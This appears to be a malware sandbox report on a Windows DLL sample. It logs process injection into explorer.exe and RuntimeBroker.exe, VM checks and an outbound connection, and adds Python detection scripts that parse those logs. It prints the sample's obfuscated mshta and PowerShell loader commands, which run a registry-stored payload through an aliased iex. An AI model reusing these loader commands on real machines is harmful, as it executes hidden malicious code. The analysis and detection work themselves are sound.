                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5391
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_05B665C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_05B699BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_05B7BAD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 3_2_05B6FD47
Source: explorer.exe, 00000022.00000000.521128576.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000022.00000000.483712623.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.475309894.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.483712623.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000003.00000002.506846492.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.385751569.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000022.00000000.521196598.00000000051D2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: RuntimeBroker.exe, 00000029.00000003.603288359.000001F9B9A60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000000.520867961.000000000514F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 3_2_05B6EC00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05B68FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_05B68FEC

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF620E112E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 8A0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF620E112E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 370000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 24D0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 36C000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 24A0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 8A0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 24A0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 370000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 24D0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 36C000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 24A0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 6364Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
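The Memory allocated / Memory written / Memory protected / Thread created and Thread register set lines above describe a three-hop injection chain: rundll32.exe into control.exe, control.exe into explorer.exe, and the injected explorer.exe into RuntimeBroker.exe. The Python below is an added example, not part of the Joe Sandbox report: it parses observation lines in that format, collects per-pair evidence of a foreign write, an executable mapping or protection change, and an execution transfer (a created thread or a thread-context change), and reports only pairs where all three primitives were seen. The sample lines, the illustrative addresses and the PID-to-image map (control.exe 6364, explorer.exe 3616, taken from the PIDs the report prints for those processes) are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample in the same "Source: <image><event>: <target> ..." shape as the
# report's observation lines; addresses are illustrative. The last line is a control
# that must not be flagged (a write with no executable mapping and no thread activity).
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 8A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 8A0000
Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 6364
Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 24A0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 24A0000
Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580
Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580
Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 2BC1580
Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\System32\notepad.exe base: 10000
"""
SAMPLE_EVENTS = SAMPLE_REPORT.strip().splitlines()

# PID-to-image map for "Thread register set" lines, which name the target only by PID.
# Constructed from the PIDs the report itself attaches to control.exe and explorer.exe.
SAMPLE_PIDS = {6364: "control.exe", 3616: "explorer.exe"}

PATH_EVENT_RE = re.compile(
    r"^Source: (?P<src>\S+?\.exe)"
    r"(?P<event>Memory allocated|Memory written|Memory protected|Thread created)"
    r": (?P<target>\S+?\.exe)(?P<rest>.*)$"
)
PID_EVENT_RE = re.compile(
    r"^Source: (?P<src>\S+?\.exe)Thread register set: target process: (?P<pid>\d+)$"
)
EXEC_PROTECT_RE = re.compile(r"protect: page execute", re.IGNORECASE)


def image(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(lines, pid_map):
    """Yield (source_image, evidence_tag, target_image) for each recognised line."""
    for line in lines:
        line = line.strip()
        m = PATH_EVENT_RE.match(line)
        if m:
            event, rest = m.group("event"), m.group("rest")
            if event == "Memory written":
                tag = "write"
            elif event == "Thread created":
                tag = "run"
            elif EXEC_PROTECT_RE.search(rest):   # allocated/protected with an execute bit
                tag = "exec"
            else:
                continue
            yield image(m.group("src")), tag, image(m.group("target"))
            continue
        m = PID_EVENT_RE.match(line)
        if m and int(m.group("pid")) in pid_map:
            # SetThreadContext-style hijack: execution transferred without a new thread
            yield image(m.group("src")), "run", pid_map[int(m.group("pid"))].lower()


REQUIRED = {"write", "exec", "run"}   # foreign write + executable memory + execution transfer


def build_injection_graph(lines, pid_map=SAMPLE_PIDS):
    """Map (source, target) -> set of evidence tags seen between the two images."""
    evidence = defaultdict(set)
    for src, tag, tgt in parse_events(lines, pid_map):
        evidence[(src, tgt)].add(tag)
    return evidence


def injection_edges(evidence):
    """Pairs where all three primitives were observed, i.e. confirmed code injection."""
    return {pair for pair, tags in evidence.items() if REQUIRED <= tags}


def injection_chains(evidence):
    """Follow confirmed edges from images nobody injected into, giving ordered chains."""
    children = defaultdict(list)
    targets = set()
    for src, tgt in sorted(injection_edges(evidence)):
        children[src].append(tgt)
        targets.add(tgt)
    chains = []

    def walk(node, path):
        if node not in children:
            chains.append(path)
            return
        for nxt in children[node]:
            walk(nxt, path + [nxt])

    for root in sorted(src for src in children if src not in targets):
        walk(root, [root])
    return chains


if __name__ == "__main__":
    for chain in injection_chains(build_injection_graph(SAMPLE_EVENTS)):
        print(" -> ".join(chain))
```

Requiring all three primitives is what keeps legitimate cross-process writes (for example a parent passing data to a child) out of the result; a pair that only shows a write, like the svchost.exe control line, stays unflagged. The same address 7FF802BC1580 appearing as the write and the thread start in both explorer.exe and RuntimeBroker.exe is consistent with the injector patching a location inside a system DLL that is mapped at the same base in every process, which is why the EIP of the created threads is identical across targets.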
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
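The process-creation lines above show the loader chain: mshta.exe executing an inline HTA that regread()s a script from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, that script launching powershell.exe which hides iex and gp behind new-alias names and decodes a further registry value, powershell.exe compiling C# through csc.exe and cvtres.exe, and cmd.exe sleeping with ping. The Python below is an added triage example, not code from the report or from the sample: it runs a few command-line rules over constructed process-creation records (parent image, child image, command line) and extracts the GUID-named key so a responder knows what to export before cleanup. The rule names and the record shape are my own; the command lines are the ones shown above with quoting normalised, and a benign PowerShell record is included as a control.

```python
import re

# Constructed process-creation records (parent image, child image, command line). The
# parent of mshta.exe is "unknown" as in the report. The last record is a benign
# PowerShell control that must not be flagged.
SAMPLE_PROCESSES = [
    ("unknown", "mshta.exe",
     "C:\\Windows\\System32\\mshta.exe \"about:<hta:application><script>Cwbm='wscript.shell';"
     "resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\\Software\\\\AppDataLow\\\\"
     "Software\\\\Microsoft\\\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\\TestLocal'));"
     "if(!window.flag)close()</script>\""),
    ("mshta.exe", "powershell.exe",
     "powershell.exe new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; "
     "famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "
     "\"HKCU:Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\").UrlsReturn))"),
    ("powershell.exe", "csc.exe",
     "csc.exe /noconfig /fullpaths @\"C:\\Users\\user\\AppData\\Local\\Temp\\rn2v1u0v\\rn2v1u0v.cmdline\""),
    ("cmd.exe", "PING.EXE", "ping localhost -n 5"),
    ("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem C:\\Users"),
]

ALIAS_IEX_RE = re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+(iex|invoke-expression)\b", re.I)
PING_SLEEP_RE = re.compile(r"\bping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+", re.I)
REG_KEY_RE = re.compile(
    r"HKCU:?\\*Software\\+AppDataLow\\+Software\\+Microsoft\\+"
    r"([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})"
)

# Each rule: name, predicate(parent_image, child_image, command_line); images are lower-cased.
RULES = [
    ("mshta_inline_hta_regread",
     lambda p, c, cl: c == "mshta.exe" and "<hta:application>" in cl.lower() and ".regread(" in cl.lower()),
    ("powershell_alias_laundered_iex",
     lambda p, c, cl: c == "powershell.exe" and ALIAS_IEX_RE.search(cl) is not None),
    ("powershell_registry_resident_payload",
     lambda p, c, cl: c == "powershell.exe" and "appdatalow" in cl.lower() and "getstring(" in cl.lower()),
    ("powershell_runtime_csharp_compile",
     lambda p, c, cl: p == "powershell.exe" and c == "csc.exe"),
    ("cmd_ping_sleep",
     lambda p, c, cl: p == "cmd.exe" and c == "ping.exe" and PING_SLEEP_RE.search(cl) is not None),
]


def triage(processes):
    """Return [(rule_name, parent_image, child_image)] for every record matching a rule."""
    hits = []
    for parent, child, cmdline in processes:
        p, c = parent.lower(), child.lower()
        for name, predicate in RULES:
            if predicate(p, c, cmdline):
                hits.append((name, p, c))
    return hits


def payload_keys(processes):
    """GUID-named keys under HKCU\\Software\\AppDataLow\\Software\\Microsoft that the chain
    reads its payload from, so a responder can export them before cleanup."""
    return {m.group(1).upper()
            for _, _, cmdline in processes
            for m in REG_KEY_RE.finditer(cmdline)}


if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESSES):
        print("%-40s %s -> %s" % hit)
    print("payload keys:", sorted(payload_keys(SAMPLE_PROCESSES)))
```

The alias rule matters because keyword matching on "iex" or "Invoke-Expression" alone misses this chain: the only call to the interpreter is through the random alias famnsyvweq. Matching the new-alias definition that points at iex, and separately the combination of an AppDataLow path with GetString, catches it regardless of the alias names chosen. The csc.exe rule is deliberately broad; PowerShell spawning the C# compiler is what Add-Type looks like and is rare outside development hosts.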
                      Source: explorer.exe, 00000022.00000000.523335281.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.516198461.0000000005E64000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000022.00000000.511545819.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.492179695.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000000.463353335.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.472145226.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.512176237.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 00000022.00000000.463731939.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.472145226.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.512176237.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
